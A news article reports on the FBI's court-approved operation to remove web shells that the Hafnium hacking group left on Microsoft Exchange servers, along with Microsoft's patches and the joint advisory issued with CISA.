Months after Hafnium – a group of China-based hackers – exploited four previously unknown vulnerabilities in Microsoft Exchange Servers, a court in Houston greenlighted the FBI’s operation to “copy and remove” backdoors from the affected servers. According to the announcement the Justice Department made on April 13, the procedure was successful.
In March, Hafnium broke into Exchange servers and stole their content, creating a way for other hacking groups targeting the vulnerable servers to deploy ransomware in the process.
Microsoft warned about hackers taking advantage of zero-day vulnerabilities, naming Hafnium as the primary instigator. Microsoft said the group tried to steal information from US defense contractors, policy think tanks, infectious disease researchers, and law firms, among other companies using Microsoft Exchange servers for enterprise-level emails. The company issued security patches in an attempt to mitigate the situation.
Microsoft’s Vice President of Customer Security & Trust, Tom Burt, said, “Even though we’ve worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.”
The FBI’s patches lessened the number of infected servers, but many remain vulnerable to further malware attacks. The Justice Department cites the fact that vulnerabilities and malware remain challenging to find and eliminate as the reason for leaving them untreated: “The FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path).”
This is reportedly the first private cybersecurity case in which the FBI was officially involved in dealing with the consequences. John C. Demers, the Assistant Attorney General for the National Security Division, said this operation “demonstrates the Department’s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions.”
Throughout March, Microsoft has been releasing the information, patches, and detection tools necessary to mitigate the attack’s aftermath. On the other hand, the FBI cooperated with the Cybersecurity & Infrastructure Security Agency (CISA) to release the Joint Advisory on Compromise of Microsoft Exchange Server. Currently, the FBI is working on informing attacked server owners about the situation via email.